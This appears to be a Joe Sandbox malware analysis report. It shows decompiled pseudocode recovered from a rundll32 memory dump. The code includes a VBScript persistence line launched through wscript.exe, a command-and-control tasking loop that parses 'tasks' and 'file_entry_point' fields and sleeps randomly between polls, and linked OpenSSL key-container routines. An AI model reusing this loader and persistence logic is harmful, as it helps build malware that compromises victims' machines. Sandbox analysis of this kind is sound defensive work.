                                        				_t185 = E0000021E21EF2FE6310(_t184, _t383 - 0x50,  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70, _t417,  *((intOrPtr*)(_t383 - 0x60)));
                                        				if (_t274 == 0xffffffff) goto 0xf2fe7b5a;
                                        				 *((long long*)(_t385 + 0x28)) = 0xffffffff;
                                        				 *((long long*)(_t385 + 0x20)) = __r12;
                                        				0xf2fe8c20();
                                        				_t366 =  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70;
                                        				_t186 = E0000021E21EF2FE6310(_t185, _t383 - 0x50,  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70,  *((intOrPtr*)(_t383 - 0x60)) + _t274,  *((intOrPtr*)(_t383 - 0x60)));
                                        				if (_t274 != 0xffffffff) goto 0xf2fe7b10;
                                        				E0000021E21EF2FE6100(_t186, 0, _t383 - 0x70);
                                        				_t368 =  >=  ?  *((void*)(_t383 - 0x50)) : _t383 - 0x50;
                                        				_t326 =  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30;
                                        				r8d =  *(_t383 - 0x40);
                                        				_t188 = E0000021E21EF301B91C(_t274, _t274,  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30,  >=  ?  *((void*)(_t383 - 0x50)) : _t383 - 0x50, _t273,  *((intOrPtr*)(_t383 - 0x60)));
                                        				 *((long long*)(_t385 + 0x78)) = __r12;
                                        				 *((long long*)(_t383 - 0x80)) = __r12;
                                        				 *((long long*)(_t383 - 0x80)) = 7;
                                        				 *((long long*)(_t385 + 0x78)) = __r12;
                                        				 *((intOrPtr*)(_t385 + 0x68)) = r12w;
                                        				r8d = 0xb;
                                        				E0000021E21EF2FE8020(_t188, 0, _t274, _t274, _t385 + 0x68, L"wscript.exe", _t274, _t273,  *((intOrPtr*)(_t383 - 0x60)) + _t274);
                                        				_t411 =  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30;
                                        				 *((long long*)(_t385 + 0x30)) = _t385 + 0x68;
                                        				E0000021E21EF30175E0(_t208, 0, _t221, _t274, L"wscript.exe", _t377, _t381, _t383 + 0x60,  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30, _t412, _t416);
                                        				if ( *((intOrPtr*)(_t383 - 0x80)) - 8 < 0) goto 0xf2fe7bfa;
                                        				0xf2fe8550();
                                        				 *((long long*)(_t383 - 0x80)) = 7;
                                        				 *((long long*)(_t385 + 0x78)) = __r12;
                                        				 *((intOrPtr*)(_t385 + 0x68)) = r12w;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE7EF0(E0000021E21EF2FE8950(_t274, _t383 + 0x38, "wscript.exe ", _t381, _t383, _t383 - 0x30,  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30), 0, _t274, _t383 - 0x30, _t385 + 0x68), 0, _t383 + 0x38);
                                        				if ( *0xf320b4b0 == 0) goto 0xf2fe7c51;
                                        				_t194 = CloseHandle(??);
                                        				 *0xf320b4b0 = __r12;
                                        				_t334 =  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30;
                                        				0xf301c460();
                                        				_t196 = E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t194, 0, _t383 - 0x50), 0, _t383 - 0x30);
                                        				goto 0xf2fe7c83;
                                        				E0000021E21EF2FE6100(_t196, 0, _t383 - 8);
                                        				_t276 =  *((intOrPtr*)(_t385 + 0x60));
                                        				if (_t276 - 0x10 < 0) goto 0xf2fe7ce5;
                                        				_t338 =  *((intOrPtr*)(_t385 + 0x48));
                                        				if (_t276 + 1 - 0x1000 < 0) goto 0xf2fe7ce0;
                                        				if (0 == 0) goto 0xf2fe7cb3;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				_t278 =  *((intOrPtr*)(_t338 - 8));
                                        				if (_t278 - _t338 < 0) goto 0xf2fe7cc2;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				_t339 = _t338 - _t278;
                                        				if (_t339 - 8 >= 0) goto 0xf2fe7cd1;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				if (_t339 - 0x27 <= 0) goto 0xf2fe7cdd;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf310ba8c();
                                        				 *((long long*)(_t385 + 0x60)) = 0xf;
                                        				 *((long long*)(_t385 + 0x58)) = __r12;
                                        				 *((char*)(_t385 + 0x48)) = 0;
                                        				E0000021E21EF2FE7FB0(0, _t383 + 0x18);
                                        				return 2;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial
                                        • String ID: .dll$Set objShell = CreateObject("Wscript.Shell")objShell.Run "rundll32.exe my_application_path, shjKeAQfgT"$my_application_path$wscript.exe$wscript.exe
                                        • API String ID: 994120019-3429855562
                                        • Opcode ID: 9c5ffe9080db362095deada25c1d1be3e442dddafeae94c1de231125c311795f
                                        • Instruction ID: bd9435a8616a62c5cf0528e04c8846444c97aa0ccfd3911b6d6a053efc7d431e
                                        • Opcode Fuzzy Hash: 9c5ffe9080db362095deada25c1d1be3e442dddafeae94c1de231125c311795f
                                        • Instruction Fuzzy Hash: 6D129A32620A4585FF11DB64DC487DE27B1E765798F520215EE5A23FEADF38C586C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 21%
                                        			E0000021E21EF302FCB0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r12) {
                                        				void* __rbp;
                                        				int _t50;
                                        				signed int _t74;
                                        				int _t101;
                                        				signed long long _t134;
                                        				signed long long _t135;
                                        				int _t139;
                                        				char* _t158;
                                        				void* _t169;
                                        				signed long long _t171;
                                        				void* _t172;
                                        				void* _t173;
                                        				void* _t174;
                                        
                                        				E0000021E21EF310C220();
                                        				_t173 = _t172 - __rax;
                                        				_t171 = _t173 + 0x30;
                                        				 *((long long*)(_t171 + 0x40)) = __rbx;
                                        				 *((long long*)(_t171 + 0x48)) = __rsi;
                                        				 *((long long*)(_t171 + 0x50)) = __rdi;
                                        				 *((long long*)(_t171 + 0x58)) = __r12;
                                        				_t134 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t135 = _t134 ^ _t171;
                                        				 *(_t171 + 0x10) = _t135;
                                        				r9d =  *(__rcx + 0x20);
                                        				_t158 = "Listing containers CSP=%s, type = %d\n";
                                        				_t169 = __rcx;
                                        				 *_t171 = 0;
                                        				r15d = 1;
                                        				E0000021E21EF302D790(_t135, _t158,  *((intOrPtr*)(__rcx + 0x18)), __r9);
                                        				if ( *((intOrPtr*)(__rcx + 0x18)) == 0) goto 0xf302fdc8;
                                        				 *((intOrPtr*)(_t173 + 0x28)) = 0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *((long long*)(_t173 + 0x20)) = __rbx;
                                        				_t50 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				_t101 = _t50;
                                        				 *(_t171 + 4) = _t101;
                                        				if (_t50 == 0) goto 0xf302fd88;
                                        				_t13 = _t135 + _t135 + 0xf; // 0xf
                                        				if (_t13 - _t135 + _t135 > 0) goto 0xf302fd54;
                                        				E0000021E21EF310C220();
                                        				_t174 = _t173 - 0xffffffffffffff0;
                                        				r9d = r9d | 0xffffffff;
                                        				 *(_t174 + 0x28) = _t101;
                                        				_t139 = _t174 + 0x30;
                                        				 *(_t174 + 0x20) = _t139;
                                        				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                        				if (_t139 != 0) goto 0xf302fdc8;
                                        				if ( *0xf3209020 != 0) goto 0xf302fd9d;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4ad;
                                        				_t19 = _t158 - 0x2a; // 0x41
                                        				r8d = _t19;
                                        				E0000021E21EF30222D0(_t54, 0x6b,  *0xf3209020, 0xfffffff0, _t139, 0xffffffffffffff0, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302DA10( *0xf3209020, 0xfffffff0, _t158);
                                        				goto 0xf3030007;
                                        				r9d =  *(_t169 + 0x20);
                                        				 *(_t174 + 0x20) = 0xf0000000;
                                        				__imp__CryptAcquireContextW();
                                        				if (0 != 0) goto 0xf302fe27;
                                        				if ( *0xf3209020 != 0) goto 0xf302fdfc;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4b5;
                                        				_t24 = _t158 - 4; // 0x67
                                        				r8d = _t24;
                                        				E0000021E21EF30222D0(_t59, 0x6b,  *0xf3209020, 0xfffffff0, _t139, _t171 + 8, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302DA10( *0xf3209020, 0xfffffff0, _t158);
                                        				goto 0xf3030007;
                                        				r8d = 0;
                                        				 *(_t174 + 0x20) = r15d;
                                        				__imp__CryptGetProvParam();
                                        				if (0 != 0) goto 0xf302fe90;
                                        				if ( *0xf3209020 != 0) goto 0xf302fe5a;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4bb;
                                        				r8d = 0x6b;
                                        				E0000021E21EF30222D0(_t64, 0x6b,  *0xf3209020, 0xfffffff0, _t139,  *((intOrPtr*)(_t171 + 8)), _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302DA10( *0xf3209020, 0xfffffff0, _t158);
                                        				__imp__CryptReleaseContext();
                                        				goto 0xf3030007;
                                        				r8d =  *_t171;
                                        				E0000021E21EF302D790(0xfffffff0, "Got max container len %d\n", _t139, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				_t160 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				r8d = 0x4c3;
                                        				_t70 =  ==  ? 0x400 :  *_t171;
                                        				 *_t171 =  ==  ? 0x400 :  *_t171;
                                        				E0000021E21EF3025700();
                                        				if (0xfffffff0 != 0) goto 0xf302ff08;
                                        				if ( *0xf3209020 != 0) goto 0xf302fee4;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4c5;
                                        				_t31 = _t160 - 0x2a; // 0x41
                                        				r8d = _t31;
                                        				E0000021E21EF30222D0(_t72, 0x6b,  *0xf3209020, 0xfffffff0, _t139, _t169, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0xf302ffe0;
                                        				asm("o16 nop [eax+eax]");
                                        				_t74 =  *_t171;
                                        				r14d = 0;
                                        				 *(_t171 + 4) = _t74;
                                        				 *0xfffffff0 = 0;
                                        				r14b = 0 == 0;
                                        				 *(_t174 + 0x20) = r14d;
                                        				__imp__CryptGetProvParam();
                                        				if (_t74 == 0) goto 0xf302ff97;
                                        				r9d =  *(_t171 + 4);
                                        				 *(_t174 + 0x28) = r14d;
                                        				 *(_t174 + 0x20) = 0;
                                        				E0000021E21EF302D790(0xfffffff0, "Container name %s, len=%d, index=%d, flags=%d\n", 0xfffffff0, _t171 + 4);
                                        				if ( *0xfffffff0 != 0) goto 0xf302ff6d;
                                        				if ( *(_t171 + 4) ==  *_t171) goto 0xf302ff86;
                                        				r8d = 0;
                                        				E0000021E21EF30263F0(0xfffffff0, "%lu. %s\n", 0xfffffff0, 0xfffffff0);
                                        				goto 0xf302ff10;
                                        				E0000021E21EF302D790(0xfffffff0, "Enumerate bug: using workaround\n", 0xfffffff0, 0xfffffff0);
                                        				goto 0xf302ffe3;
                                        				if (GetLastError() == 0x103) goto 0xf302ffe3;
                                        				if ( *0xf3209020 != 0) goto 0xf302ffbb;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
                                        				 *(_t174 + 0x20) = 0x4d6;
                                        				r8d = 0x6b;
                                        				E0000021E21EF30222D0(_t81, 0x6b,  *0xf3209020, 0xfffffff0, _t139, _t169, "Enumerate bug: using workaround\n", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E0000021E21EF302D9B0(_t79,  *0xf3209020, 0xfffffff0, "Enumerate bug: using workaround\n");
                                        				r15d = 0;
                                        				r8d = 0x4e7;
                                        				E0000021E21EF3025750();
                                        				__imp__CryptReleaseContext();
                                        				E0000021E21EF310C290();
                                        				return r15d;
                                        			}
















                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Similarity
                                        • API ID: Crypt$Context$ByteCharMultiParamProvReleaseWide$AcquireErrorLast
                                        • String ID: %lu. %s$..\..\openssl-1.1.0f\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
                                        • API String ID: 1510837364-3467115363
                                        • Opcode ID: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction ID: 9ae390343397b1a59f587f5d28b9be190767789e978db40ce672bbd856f03b73
                                        • Opcode Fuzzy Hash: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction Fuzzy Hash: A0A15B76300A409AFF609F65DC487DB37A1F769B98F528126EE0A87E99DB3CC506C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E0000021E21EF2FE990A() {
                                        				void* _t365;
                                        				signed int _t398;
                                        				void* _t401;
                                        				void* _t403;
                                        				void* _t423;
                                        				signed int _t440;
                                        				void* _t445;
                                        				void* _t449;
                                        				signed char _t488;
                                        				signed char _t490;
                                        				signed char _t497;
                                        				signed char _t501;
                                        				void* _t531;
                                        				void* _t535;
                                        				signed long long* _t657;
                                        				intOrPtr _t658;
                                        				intOrPtr _t660;
                                        				intOrPtr _t661;
                                        				intOrPtr _t663;
                                        				signed long long _t665;
                                        				signed long long _t668;
                                        				signed long long _t670;
                                        				signed long long _t673;
                                        				signed int* _t677;
                                        				signed long long _t679;
                                        				signed long long _t682;
                                        				signed long long _t684;
                                        				signed long long _t686;
                                        				signed long long _t689;
                                        				signed long long _t691;
                                        				signed long long _t693;
                                        				signed long long _t696;
                                        				signed long long _t698;
                                        				signed long long _t701;
                                        				signed long long _t703;
                                        				intOrPtr _t709;
                                        				intOrPtr _t711;
                                        				intOrPtr _t712;
                                        				long long _t714;
                                        				intOrPtr _t715;
                                        				intOrPtr _t717;
                                        				intOrPtr _t718;
                                        				intOrPtr _t720;
                                        				intOrPtr _t721;
                                        				intOrPtr _t723;
                                        				void* _t726;
                                        				signed long long _t727;
                                        				signed long long _t728;
                                        				signed long long _t730;
                                        				signed long long _t732;
                                        				signed long long _t734;
                                        				signed long long _t736;
                                        				signed long long _t738;
                                        				void* _t740;
                                        				intOrPtr _t744;
                                        				intOrPtr _t752;
                                        				void* _t753;
                                        				intOrPtr _t755;
                                        				void* _t756;
                                        				intOrPtr _t802;
                                        				void* _t803;
                                        				intOrPtr _t805;
                                        				void* _t806;
                                        				intOrPtr _t829;
                                        				void* _t830;
                                        				intOrPtr _t840;
                                        				void* _t841;
                                        				intOrPtr _t843;
                                        				void* _t844;
                                        				void* _t861;
                                        				void* _t922;
                                        				signed long long _t923;
                                        				intOrPtr _t925;
                                        				void* _t926;
                                        				void* _t927;
                                        				signed long long _t928;
                                        				signed long long _t932;
                                        				intOrPtr _t934;
                                        				long long* _t935;
                                        				void* _t936;
                                        				signed long long _t939;
                                        				signed long long _t942;
                                        				signed long long _t946;
                                        				void* _t966;
                                        				void* _t974;
                                        				signed long long _t977;
                                        				signed long long _t978;
                                        				signed long long _t979;
                                        				signed long long _t980;
                                        				signed long long _t981;
                                        				signed long long _t983;
                                        
                                        				_t863 =  >=  ?  *((void*)(_t935 + 0x50)) : _t935 + 0x50;
                                        				r8d =  *(_t935 + 0x60);
                                        				E0000021E21EF2FE1080(_t935 + 0x480,  >=  ?  *((void*)(_t935 + 0x50)) : _t935 + 0x50);
                                        				_t865 =  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70;
                                        				r8d =  *(_t935 - 0x80);
                                        				E0000021E21EF2FE1290(E0000021E21EF2FE1400( *((long long*)(_t935 - 0x78)) - 0x10, _t935 + 0x480,  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70), _t935 + 0x480);
                                        				 *(_t935 + 0xc0) = _t657;
                                        				 *(_t935 + 0xc8) = _t657;
                                        				 *((intOrPtr*)(_t935 + 0xce)) = r15w;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqa [ebp+0xd0], xmm0");
                                        				asm("xorps xmm1, xmm1");
                                        				asm("movdqa [ebp+0xe0], xmm1");
                                        				asm("movdqa [ebp+0xf0], xmm0");
                                        				 *(_t935 + 0x100) = _t981;
                                        				 *((long long*)(_t935 + 0x108)) = 0x400;
                                        				 *(_t935 + 0x110) = r15d;
                                        				 *(_t935 + 0x118) = _t981;
                                        				if ( *(_t935 + 0xd0) != _t657) goto 0xf2fe99e9;
                                        				E0000021E21EF310B674(_t657, _t935 + 0x480);
                                        				 *(_t935 + 0x330) = _t657;
                                        				 *_t657 = _t981;
                                        				_t657[1] = 0x10000;
                                        				_t657[2] = _t981;
                                        				_t657[3] = _t981;
                                        				_t657[4] = _t981;
                                        				 *(_t935 + 0xd0) = _t657;
                                        				 *(_t935 + 0xd8) = _t657;
                                        				_t867 =  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70;
                                        				_t31 = _t935 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEBB60(_t726, _t31,  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70, _t927);
                                        				if (_t657[0xa] == 0) goto 0xf2fe9b18;
                                        				r8d = E0000021E21EF3111C60(_t657);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t488 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *(_t935 + 0xd8) == 0) goto 0xf2fe9a4f;
                                        				_t365 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t726,  *(_t935 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t658 =  *((intOrPtr*)(_t935 - 0x78));
                                        				if (_t658 - 0x10 < 0) goto 0xf2fe9ab7;
                                        				_t752 =  *((intOrPtr*)(_t936 + 0x70));
                                        				if (_t658 + 1 - _t922 < 0) goto 0xf2fe9ab2;
                                        				if ((_t488 & 0x0000001f) != 0) goto 0xf2fea88f;
                                        				_t660 =  *((intOrPtr*)(_t752 - 8));
                                        				if (_t660 - _t752 >= 0) goto 0xf2fea889;
                                        				_t753 = _t752 - _t660;
                                        				if (_t753 - 8 < 0) goto 0xf2fea883;
                                        				if (_t753 - 0x27 > 0) goto 0xf2fea87d;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t935 - 0x78)) = 0xf;
                                        				 *(_t935 - 0x80) = _t981;
                                        				 *((char*)(_t936 + 0x70)) = 0;
                                        				_t661 =  *((intOrPtr*)(_t935 - 0x38));
                                        				if (_t661 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t755 =  *((intOrPtr*)(_t935 - 0x50));
                                        				if (_t661 + 1 - _t922 < 0) goto 0xf2fe98e9;
                                        				if ((_t488 & 0x0000001f) != 0) goto 0xf2fea8a7;
                                        				_t663 =  *((intOrPtr*)(_t755 - 8));
                                        				if (_t663 - _t755 >= 0) goto 0xf2fea8a1;
                                        				_t756 = _t755 - _t663;
                                        				if (_t756 - 8 < 0) goto 0xf2fea89b;
                                        				if (_t756 - 0x27 > 0) goto 0xf2fea895;
                                        				goto 0xf2fe98e6;
                                        				_t923 =  *((intOrPtr*)(_t935 - 0x30));
                                        				_t727 = _t923;
                                        				 *(_t935 + 8) = _t727;
                                        				_t928 =  *(_t935 - 0x28);
                                        				if (_t923 == _t928) goto 0xf2fe9b59;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t365, _t488, _t727 + 0x48), _t488, _t727 + 0x28), _t488, _t727);
                                        				_t728 = _t727 + 0x70;
                                        				 *(_t935 + 8) = _t728;
                                        				if (_t728 != _t928) goto 0xf2fe9b30;
                                        				_t977 = _t923;
                                        				 *(_t935 - 0x28) = _t923;
                                        				if ( *((short*)(_t935 + 0xce)) != 3) goto 0xf2fea70b;
                                        				_t665 =  *(_t935 + 0xc8) & 0xffffffff;
                                        				_t730 = (_t728 << 5) + _t665;
                                        				_t63 = _t935 + 0x338; // 0x33b
                                        				_t64 = _t935 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEB470(_t531, _t730, _t64, _t63, 0xffffffff, _t935, "response_status");
                                        				if ( *_t665 == _t730) goto 0xf2fe9c02;
                                        				 *(_t935 + 0x40) = _t665;
                                        				 *(_t935 + 0x48) = _t665;
                                        				 *((short*)(_t935 + 0x4e)) = 0x405;
                                        				_t668 =  *(_t935 + 0x48) & 0x00000000 | "response_status";
                                        				 *(_t935 + 0x48) = _t668;
                                        				 *(_t935 + 0x40) = 0xf;
                                        				E0000021E21EF2FEBA50(_t935 + 0xc0, _t935 + 0x40, _t923, 0xffffffff, _t935, _t977, _t981);
                                        				r12d =  *_t668;
                                        				 *((intOrPtr*)(_t935 + 0x5e0)) = r12d;
                                        				_t670 =  *(_t935 + 0xc8) & 0xffffffff;
                                        				_t732 = (_t730 << 5) + _t670;
                                        				_t76 = _t935 + 0x340; // 0x343
                                        				_t77 = _t935 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEB470(_t531, _t732, _t77, _t76, 0xffffffff, _t935, "tasks");
                                        				if ( *_t670 == _t732) goto 0xf2fea155;
                                        				 *(_t935 + 0x30) = _t670;
                                        				 *(_t935 + 0x38) = _t670;
                                        				 *((short*)(_t935 + 0x3e)) = 0x405;
                                        				_t673 =  *(_t935 + 0x38) & 0x00000000 | "tasks";
                                        				 *(_t935 + 0x38) = _t673;
                                        				 *(_t935 + 0x30) = 5;
                                        				E0000021E21EF2FEBA50(_t935 + 0xc0, _t935 + 0x30, _t923, 0, _t935, _t977, _t981);
                                        				if ( *((short*)(_t673 + 0xe)) != 4) goto 0xf2fea155;
                                        				 *(_t935 + 0x70) = _t673;
                                        				 *(_t935 + 0x78) = _t673;
                                        				 *((short*)(_t935 + 0x7e)) = 0x405;
                                        				 *(_t935 + 0x78) =  *(_t935 + 0x78) & 0x00000000 | "tasks";
                                        				 *(_t935 + 0x70) = 5;
                                        				E0000021E21EF2FEB090(E0000021E21EF2FEBA50(_t935 + 0xc0, _t935 + 0x70, _t923, 0, _t935, _t977, _t981),  *(_t935 + 0x78) & 0x00000000 | "tasks", _t935 + 0x1c8);
                                        				_t677 =  *((intOrPtr*)(_t935 + 0x1c8));
                                        				_t932 = _t677[2] & 0xffffffff;
                                        				r15d =  *_t677;
                                        				_t983 = (_t981 << 4) + _t932;
                                        				if (_t932 == _t983) goto 0xf2fea152;
                                        				r12d = 0x1000;
                                        				 *(_t935 + 0x250) = _t677;
                                        				 *(_t935 + 0x258) = _t677;
                                        				 *(_t935 + 0x258) = 0xf;
                                        				 *(_t935 + 0x250) = _t677;
                                        				 *((char*)(_t935 + 0x240)) = 0;
                                        				 *(_t935 + 0x278) = _t677;
                                        				 *(_t935 + 0x280) = _t677;
                                        				 *(_t935 + 0x280) = 0xf;
                                        				 *(_t935 + 0x278) = _t677;
                                        				 *((char*)(_t935 + 0x268)) = 0;
                                        				 *(_t935 + 0x298) = _t677;
                                        				 *(_t935 + 0x2a0) = _t677;
                                        				 *(_t935 + 0x2a0) = 0xf;
                                        				 *(_t935 + 0x298) = _t677;
                                        				 *((char*)(_t935 + 0x288)) = 0;
                                        				if ( *((short*)(_t932 + 0xe)) != 3) goto 0xf2fea112;
                                        				_t679 =  *(_t932 + 8) & 0xffffffff;
                                        				_t734 = (_t732 << 5) + _t679;
                                        				_t939 = "task_data";
                                        				E0000021E21EF2FEB470(_t531, _t734, _t932, _t935 + 0x360, _t932, _t935, _t939);
                                        				if ( *_t679 == _t734) goto 0xf2fe9e4e;
                                        				 *(_t935 + 0x80) = _t679;
                                        				 *(_t935 + 0x88) = _t679;
                                        				 *((short*)(_t935 + 0x8e)) = 0x405;
                                        				_t682 =  *(_t935 + 0x88) & 0x00000000 | "task_data";
                                        				 *(_t935 + 0x88) = _t682;
                                        				 *(_t935 + 0x80) = 9;
                                        				E0000021E21EF2FEBA50(_t932, _t935 + 0x80, _t923, _t932, _t935, _t977, _t983);
                                        				if (( *(_t682 + 0xe) & r12w) != 0) goto 0xf2fe9e27;
                                        				_t684 =  *(_t682 + 8) & 0xffffffff;
                                        				if ( *_t684 != 0) goto 0xf2fe9e31;
                                        				r8d = 0;
                                        				goto 0xf2fe9e3f;
                                        				if ( *((char*)(_t684 + (_t939 | 0xffffffff) + 1)) != 0) goto 0xf2fe9e35;
                                        				E0000021E21EF2FE6400(_t734, _t935 + 0x268, _t684, _t932, (_t939 | 0xffffffff) + 1);
                                        				_t686 =  *(_t932 + 8) & 0xffffffff;
                                        				_t736 = (_t734 << 5) + _t686;
                                        				_t942 = "task";
                                        				E0000021E21EF2FEB470(_t531, _t736, _t932, _t935 + 0x348, _t932, _t935, _t942);
                                        				if ( *_t686 == _t736) goto 0xf2fe9f0d;
                                        				 *(_t935 + 0x90) = _t686;
                                        				 *(_t935 + 0x98) = _t686;
                                        				 *((short*)(_t935 + 0x9e)) = 0x405;
                                        				_t689 =  *(_t935 + 0x98) & 0x00000000 | "task";
                                        				 *(_t935 + 0x98) = _t689;
                                        				 *(_t935 + 0x90) = 4;
                                        				E0000021E21EF2FEBA50(_t932, _t935 + 0x90, _t923, _t932, _t935, _t977, _t983);
                                        				if (( *(_t689 + 0xe) & r12w) != 0) goto 0xf2fe9ee6;
                                        				_t691 =  *(_t689 + 8) & 0xffffffff;
                                        				if ( *_t691 != 0) goto 0xf2fe9ef0;
                                        				r8d = 0;
                                        				goto 0xf2fe9efe;
                                        				if ( *((char*)(_t691 + (_t942 | 0xffffffff) + 1)) != 0) goto 0xf2fe9ef4;
                                        				E0000021E21EF2FE6400(_t736, _t935 + 0x240, _t691, _t932, (_t942 | 0xffffffff) + 1);
                                        				_t693 =  *(_t932 + 8) & 0xffffffff;
                                        				_t738 = (_t736 << 5) + _t693;
                                        				E0000021E21EF2FEB470(_t531, _t738, _t932, _t935 + 0x350, _t932, _t935, "task_id");
                                        				if ( *_t693 == _t738) goto 0xf2fe9f9b;
                                        				 *(_t935 + 0xa0) = _t693;
                                        				 *(_t935 + 0xa8) = _t693;
                                        				 *((short*)(_t935 + 0xae)) = 0x405;
                                        				_t696 =  *(_t935 + 0xa8) & 0x00000000 | "task_id";
                                        				 *(_t935 + 0xa8) = _t696;
                                        				 *(_t935 + 0xa0) = 7;
                                        				E0000021E21EF2FEBA50(_t932, _t935 + 0xa0, _t923, _t932, _t935, _t977, _t983);
                                        				 *((intOrPtr*)(_t935 + 0x260)) =  *_t696;
                                        				_t698 =  *(_t932 + 8) & 0xffffffff;
                                        				_t740 = (_t738 << 5) + _t698;
                                        				_t946 = "file_entry_point";
                                        				E0000021E21EF2FEB470(_t531, _t740, _t932, _t935 + 0x358, _t932, _t935, _t946);
                                        				if ( *_t698 == _t740) goto 0xf2fea05a;
                                        				 *(_t935 + 0xb0) = _t698;
                                        				 *(_t935 + 0xb8) = _t698;
                                        				 *((short*)(_t935 + 0xbe)) = 0x405;
                                        				_t701 =  *(_t935 + 0xb8) & 0x00000000 | "file_entry_point";
                                        				 *(_t935 + 0xb8) = _t701;
                                        				 *(_t935 + 0xb0) = 0x10;
                                        				E0000021E21EF2FEBA50(_t932, _t935 + 0xb0, _t923, _t932, _t935, _t977, _t983);
                                        				if (( *(_t701 + 0xe) & r12w) != 0) goto 0xf2fea033;
                                        				_t703 =  *(_t701 + 8) & 0xffffffff;
                                        				if ( *_t703 != 0) goto 0xf2fea03d;
                                        				r8d = 0;
                                        				goto 0xf2fea04b;
                                        				if ( *((char*)(_t703 + (_t946 | 0xffffffff) + 1)) != 0) goto 0xf2fea041;
                                        				_t398 = E0000021E21EF2FE6400(_t740, _t935 + 0x288, _t703, _t932, (_t946 | 0xffffffff) + 1);
                                        				if (_t935 + 0x240 - _t977 >= 0) goto 0xf2fea0d3;
                                        				if (_t923 - _t935 + 0x240 > 0) goto 0xf2fea0d3;
                                        				if (_t977 !=  *((intOrPtr*)(_t935 - 0x20))) goto 0xf2fea0b1;
                                        				E0000021E21EF2FEB0F0(_t398 * (_t935 + 0x240 - _t923), _t935 - 0x30);
                                        				_t978 =  *(_t935 - 0x28);
                                        				 *(_t935 + 8) = _t978;
                                        				 *(_t935 + 0x1d0) = _t978;
                                        				if (_t978 == 0) goto 0xf2fea0d1;
                                        				_t401 = E0000021E21EF2FEBCF0(_t703 >> 5 >> 0x3f, (_t703 >> 5) + (_t703 >> 5 >> 0x3f), _t978, ((_t703 >> 5) + (_t703 >> 5 >> 0x3f)) * 0x70 +  *((intOrPtr*)(_t935 - 0x30)), _t966);
                                        				goto 0xf2fea10a;
